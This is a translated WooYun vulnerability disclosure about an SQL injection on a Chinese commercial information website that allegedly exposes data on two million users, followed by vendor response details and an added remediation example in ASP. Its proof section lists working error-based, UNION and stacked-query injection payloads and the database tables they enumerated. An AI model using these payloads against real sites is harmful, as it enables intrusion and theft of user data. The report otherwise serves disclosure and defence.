
Vulnerability summary

Defect ID: wooyun-2016-0168118

Title: SQL injection on 中商信息网 (China Commercial Information Network) leaks 200w (2 million) users' data

Vendor: 中商信息网

Author: 路人甲

Submitted: 2016-01-08 02:28

Fixed: 2016-02-22 16:48

Disclosed: 2016-02-22 16:48

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2016-01-08: Details sent to the vendor, awaiting vendor handling
2016-01-12: Vendor confirmed; details visible to the vendor only
2016-01-22: Details disclosed to core white hats and relevant domain experts
2016-02-01: Details disclosed to regular white hats
2016-02-11: Details disclosed to intern white hats
2016-02-22: Details disclosed to the public

Brief description:

RT (see title)

Details:

http://**.**.**.**/03/chat/messagelist.asp?id=

Proof of vulnerability:

Place: GET
Parameter: id
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
Payload: id=-8735' OR 5469=CONVERT(INT,(SELECT CHAR(113)+CHAR(114)+CHAR(118)+CHAR(116)+CHAR(113)+(SELECT (CASE WHEN (5469=5469) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(108)+CHAR(113))) AND 'stgN'='stgN
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=' UNION ALL SELECT NULL,CHAR(113)+CHAR(114)+CHAR(118)+CHAR(116)+CHAR(113)+CHAR(103)+CHAR(69)+CHAR(102)+CHAR(111)+CHAR(99)+CHAR(66)+CHAR(65)+CHAR(119)+CHAR(98)+CHAR(104)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(108)+CHAR(113)--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id='; WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
Database: DataCenter
Table: TUCommRegister_TMP
[10 entries]
Database: DBMachine

Remediation:

Parameter filtering
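The remediation above is a single phrase, so here is what parameter filtering for the `id` parameter of a classic ASP page on SQL Server looks like in practice. This is an added example, not code from the original report or from the site: it shows the string-concatenation pattern that the error-based, UNION and stacked-query payloads in the proof all depend on, beside a version that allow-lists the value as a bounded integer and binds it as a typed ADODB parameter. The table and column names (`Messages`, `MsgId`, `Body`) and the open `ADODB.Connection` passed in as `conn` are assumptions.

```vbscript
<%
' Added example (not the site's code): assumed table "Messages" with
' columns MsgId (INT) and Body, read through an open ADODB.Connection.

' Vulnerable pattern. The raw query-string value is spliced into the SQL
' text, so a quote in "id" closes the literal and the rest of the input
' is parsed as SQL. This is the shape that lets the error-based, UNION
' and stacked WAITFOR payloads in the proof above succeed.
Function GetMessagesUnsafe(conn)
    Dim sql
    sql = "SELECT MsgId, Body FROM Messages WHERE MsgId = '" _
        & Request.QueryString("id") & "'"
    Set GetMessagesUnsafe = conn.Execute(sql)
End Function

' Hardened version: allow-list the value as a bounded integer first,
' then bind it as a typed parameter. The value never becomes part of the
' SQL text, so quotes, comment markers and keywords in it are only data.
Function GetMessagesSafe(conn)
    Dim raw, re, cmd
    raw = Trim(Request.QueryString("id"))

    Set re = New RegExp
    re.Pattern = "^[0-9]{1,9}$"   ' digits only, fits a SQL Server INT
    If Not re.Test(raw) Then
        Response.Status = "400 Bad Request"
        Response.Write "invalid id"
        Response.End               ' stops the page; nothing below runs
    End If

    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = 1           ' adCmdText
    cmd.CommandText = "SELECT MsgId, Body FROM Messages WHERE MsgId = ?"
    ' adInteger = 3, adParamInput = 1; Size is omitted for integers
    cmd.Parameters.Append cmd.CreateParameter("id", 3, 1, , CLng(raw))
    Set GetMessagesSafe = cmd.Execute
End Function
%>
```

The proof above enumerates tables across two databases, so the database login used by messagelist.asp should also be limited to the tables it actually needs; parameter binding stops the injection, while least privilege bounds what any bypass elsewhere could reach.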

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2016-01-12 15:09

Vendor reply:

CNVD did not directly reproduce the described situation; CNVD has notified the site's administrators by email through their publicly listed contact channel, and they will provide a solution going forward.

Latest status:

None yet